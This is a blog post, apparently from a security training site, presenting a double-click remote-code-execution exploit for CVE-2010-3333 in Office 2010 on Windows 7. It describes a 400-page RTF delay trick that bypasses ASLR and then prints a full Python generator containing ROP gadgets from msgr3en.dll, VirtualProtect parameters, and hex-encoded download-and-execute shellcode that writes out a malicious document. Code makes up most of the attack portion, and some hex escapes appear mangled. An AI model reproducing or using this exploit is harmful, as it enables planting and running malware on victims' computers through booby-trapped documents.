Hacking

Loading Msgreen.dll to Bypass DEP Office 2010 Windows 7 Double-Click RCE Exploit

In this post, I am going to discuss a new technique that I used to bypass ASLR on windows 7 for office 2010. By the end of this post you will be able to recognize how to run an exploit on windows 7 for office 2010.

For the sake of simplicity, I have again selected the CVE 2010-3333. In my last post, I discussed the entire concept about exploit for Windows XP; here, I will be discussing it for windows 7. One subtle difference between XP and windows 7 that is in XP there is no any concept of ASLR, while in windows 7 ASLR is a new concept. That's why successfully using the exploit in windows 7 is quite complex compared to that of XP. One point to note is that if an application equipped with both ASLR and DEP together, it becomes quit difficult to bypass it, though but not impossible. Now I am going to discuss a bit more about ASLR/DEP.

Address Space Layout Randomisation (ASLR) is a technology used to help prevent shellcode from being successful. It does this by randomly offsetting the location of modules and certain in-memory structures. Data Execution Prevention (DEP) prevents certain memory sectors (e.g. the stack) from being executed. When combined, it becomes exceedingly difficult to exploit vulnerabilities in applications using shellcode or return-oriented programming (ROP) techniques.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

In the last post I already mentionedthe process of how to bypass DEP using Return oriented programming. So now I am not going to discuss how to make the ROP chain in detail, but rather I will directly move to the point to make our exploit successful on windows 7 office 2010. So as we know that on windows 7, all modules are ASLR (Address Space Layout Randomisation) enabled, so I have to carefully choose the module which are not ASLR enabled, and from that module we will make the ROP chain to bypass DEP.

So it's clear now that we have to make an ROP chain from the same dll that is msgr3en.dll in order to bypass DEP.

Now here is where the magic begins; msgr3en.dll gets loaded after a long interval of time and it means that our exploit will not work; our exploit will work only if we open our exploit from file->open

[caption id="" align="alignnone" width="608"] Click on image to see a larger view[/caption]

But we don't want that our exploit will work through file → open. We want our exploit to work by double clicking.The main problem with msgren.dll is that this dll is loaded after long interval of time. So we have to make this exploit in such a way that our shellcode/ROP should get executed once the msgreen.dll file get loaded. In order to achieve that, I have used a technique that I have embedded 400 line of page to make a delay so that msgreen.dll can get loaded before the execution of our ROP and shellcode. Once all the 400 pages get loaded, msgreen.dll will get loaded automatically, after our shellcode get executed. The rest are the same: that is, the ROP chain etc that I used from msgreen.dll .

Now one question we have is how to load four hundred pages? Well, first look at the following code, our exploit/payload has been started with a variable called tmpl. This is the magic that are supposed to use all 400 pages.

fo = open("template", "rb")

tmpl = fo.read();

fo.close()

herefo=open("template", "rb")

This function has been used to open a template file that function is to load 400 pages and while opening this page or after 400 pages get loaded,msgreen.dll will get loaded, and once the msgreen.dll gets loaded our all code that is ropchain,shellcode, etc.. will executed and exploit will get done.

Here's how to make the template for 400 pages. It's nothing more than just opening MSoffice, press enter 400 times (to make 400 pages), save it as rtf file and it's all done.

<399 pages created >

Then save it as a template. Now this is the file that gets loaded to make the delay to load msgreen.dll. After this template, I have used the header (as in following code) that contains the actual vulnerable function and parameters for the pFragment section.

payload = tmpl + header + Main + req + control + rop + VirtualProtect + param1 + param2 + call + nops + shellcode + end

So now I hope it's clear and visible to you that it's the value of all variables that makes parts of payload above. I can include all hex values of the template in the same page where the exploit exists, but it become lengthy. I still am giving you the image of the hex value.

Here is the complete code for the exploit…

[code]

#!/usr/bin/python

importstruct

importbinascii

header = ("x7Bx5Cx73x68x70x7Bx5Cx73x70x7Dx7D"

"x7Bx5Cx73x68x70x7Bx5Cx73x70x7Dx7Dx7Bx5Cx73x68x70x7B"

"x5Cx73x70x7Dx7Dx7Bx5Cx23x73x68x70x7Bx5Cx2Ax5Cx73x68"

"x70x69x6Ex73x74x5Cx73x68x70x66x68x64x72x30x5Cx23x73"

"x68x70x62x78x63x6Fx6Cx75x6Dx6Ex5Cx73x68x70x62x79x70"

"x61x72x61x5Cx73x68x20x70x77x72x32x7Dx7Bx5Cx73x70x7B"

"x7Bx5Cx73x6Ex20x7Bx7Dx7Bx7Dx7Bx5Cx73x6Ex7Dx7Bx5Cx73"

"x6Ex7Dx7Bx7Bx5Cx2Ax5Cx2Ax7Dx7Dx70x46x72x61x67x6Dx65"

"x6Ex74x73x7Dx7Bx5Cx2Ax5Cx2Ax5Cx2Ax7Dx7Bx23x5Cx73x76"

"x7Bx5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2A"

"x5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5C"

"x2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2A"

"x5Cx2Ax7Dx39x3Bx32x3Bx66x66x66x66x66x66x66x66x66x66"

"x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23"

"x23x23x23x23x23x23x23x23x30x35x30x30x30x30x41x30x30"

"x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30"

"x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30")

#Main Control

Main = "1780203f" # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **

req = ("x31x31x31x31x31x31x31x31x31x31x31x31" # 00000060

"x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31" # 00000070

"x31x31x31x31x30x30x30x30x30x30x30x30")

control = "1780203f" # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **

control += "1780203f" # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] **

#-----------------------put Stack Pointer in EAX & EDI --------------------------#

rop = "8546393f" # 0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN [Module : MSGR3EN.DLL] **

rop += "41414141" # Padding for POP ESI

rop += "28fc393f" # 0x3F39FC28 : # MOV EAX,EDI # POP ESI # RETN [Module : MSGR3EN.DLL] **

rop += "41414141" # Padding for POP ESI

rop += "a013353f" # 0x3F3513A0 : 20 : # ADD ESP,20 # RETN 4 - MSGR3EN.DLL - **

rop += "41414141" * 2 # Padding for JUMP

#-------------------Parameters for VirtualProtect() ----------------------------#

VirtualProtect = "825a203f" # 0x3f205a82 : # JMP ECX | Call VirtualProtect()

VirtualProtect += "41414141" # Return Address

VirtualProtect += "42424242" # lpAdress

VirtualProtect += "dc050000" # Size 1500

VirtualProtect += "40000000" # flNewProtect

VirtualProtect += "10133b3f" # Writeable Address 3F3B1310

#-------------------- Setting 1st Parameter --------------------------------------#

param1 = "bff62e3f" # 0x3F2EF6BF : # XCHG EAX,EDX # RETN [Module : MSGR3EN.DLL] **

param1 += "41414141" # Padding for ADD ESP,20 # RETN 4

param1 += "8c58343f" # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] **

param1 += "ef94303f" # 0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] **

param1 += "8c58343f" # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] **

param1 += "f782393f" # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] **

param1 += "41414141" # Padding for POP EBP

param1 += "e982393f" # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] **

param1 += "41414141" # Padding for POP EBP

param1 += "8aa02c3f" # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] **

param1 += "1197363f" # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] **

param1 += "41414141" # Padding for POP EDI

param1 += "41414141" # Padding for POP ESI

#-------------------- Setting 2nd Parameter --------------------------------------#

param2 = "8c58343f" # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] **

param2 += "41414141" # Padding for RETN 4

param2 += "ef94303f" # 0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] **

param2 += "8c58343f" # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] **

param2 += "f782393f" # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] **

param2 += "41414141" # Padding for POP EBP

param2 += "e982393f" # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] **

param2 += "41414141" # Padding for POP EBP

param2 += "8aa02c3f" # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] **

param2 += "1197363f" # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] **

param2 += "41414141" # Padding for POP EDI

param2 += "41414141" # Padding for POP ESI

#------------------------- Fetch & Call VirtualProtect() address ----------------------#

call = "8c58343f" # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] **

call += "41414141" # Padding for RET 4

call += "4ced2f3f" # 0x3f2fed4c : # POP EAX # RETN ** [MSGR3EN.DLL]

call += "0811103f" # PTR to VirtualProtect()

call += "5e742b3f" # 0x3f2b745e : # MOV ECX,DWORD PTR DS:[EAX] # RETN ** [MSGR3EN.DLL]

call += "8c58343f" # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] **

call += "30d7393f" # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] **

call += "08da2f3f" # 0x3F2FDA08 : # XCHG EAX,ESP # RETN [Module : MSGR3EN.DLL] **

nops = "90" * 180

magic = (

"x65x62x37x31x33x31x63x39x36x34x38x62x37x31x33x30x38"

"x62x37x36x30x63x38x62x37x36x31x63x38x62x35x65x30x38"

"x38x62x37x65x32x30x38x62x33x36x36x36x33x39x34x66x31"

"x38x37x35x66x32x63x33x36x30x38x62x36x63x32x34x32x34"

"x38x62x34x35x33x63x38x62x35x34x32x38x37x38x30x31x65"

"x61x38x62x34x61x31x38x38x62x35x61x32x30x30x31x65x62"

"x65x33x33x34x34x39x38x62x33x34x38x62x30x31x65x65x33"

"x31x66x66x33x31x63x30x66x63x61x63x38x34x63x30x37x34"

"x30x37x63x31x63x66x30x64x30x31x63x37x65x62x66x34x33"

"x62x37x63x32x34x32x38x37x35x65x31x38x62x35x61x32x34"

"x30x31x65x62x36x36x38x62x30x63x34x62x38x62x35x61x31"

"x63x30x31x65x62x38x62x30x34x38x62x30x31x65x38x38x39"

"x34x34x32x34x31x63x36x31x63x33x65x38x39x32x66x66x66"

"x66x66x66x35x64x65x62x30x35x65x38x66x33x66x66x66x66"

"x66x66x38x39x65x66x38x33x65x66x38x39x38x39x65x65x38"

"x33x65x65x39x35x38x31x65x64x34x35x66x66x66x66x66x66"

"x36x38x33x33x63x61x38x61x35x62x35x33x65x38x38x61x66"

"x66x66x66x66x66x35x35x36x61x36x34x66x66x64x30x35x37"

"x38x39x63x37x30x31x65x66x61x34x38x30x37x66x66x66x30"

"x30x37x35x66x39x35x66x36x38x38x65x34x65x30x65x65x63"

"x35x33x65x38x36x64x66x66x66x66x66x66x33x31x63x39x36"

"x36x62x39x36x66x36x65x35x31x36x38x37x35x37x32x36x63"

"x36x64x35x34x66x66x64x30x36x38x33x36x31x61x32x66x37"

"x30x35x30x65x38x35x33x66x66x66x66x66x66x33x31x63x39"

"x35x31x35x31x35x35x35x37x35x31x66x66x64x30x36x38x39"

"x38x66x65x38x61x30x65x35x33x65x38x33x66x66x66x66x66"

"x66x66x34x31x35x31x35x35x66x66x64x30x37x33x37x36x36"

"x33x36x38x36x66x37x33x37x34x32x65x36x35x37x38x36x35"

"x30x30"

)

URL = "write url here"
binnu = binascii.b2a_hex(URL)

URL2 = "00"

shellcode = magic + binnu + URL2

end = ("x7Bx7Dx7Dx7Dx7Dx7Dx7Dx2Ex2Ex2Ex7Dx7D")

fo = open("template", "rb")

tmpl = fo.read();

fo.close()

####################################

payload = tmpl + header + Main + req + control + rop + VirtualProtect + param1 + param2 + call + nops + shellcode + end

#############################################

file = open("Exploit.doc",'wb')

file.write(payload)

file.close

[/code]

Here, all the variables in the payload are quite clear and self-understood. I was talking about tmpl variable in the payload – the tmpl is just a rtf file having 400 pages, so the pages get loaded first and then the rest of the code gets executed. Let's generate the sample and execute the code…

The exploit code has been executed. Look closely at the status bar above and you'll see the message page 1 of 399.This is the great, because it shows the 399 pages get loaded by just of that tmpl variable.

Here is the content of tmpl. I am not going to publish the content of tmpl. You think and decide what should be the content of tmpl.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

Here is the content of tmpl that I have used to bypass msgreen.dll.

Posted: February 5, 2013

Anonymous

View Profile

Loading Msgreen.dll to Bypass DEP Office 2010 Windows 7 Double-Click RCE Exploit

Get certified and advance your career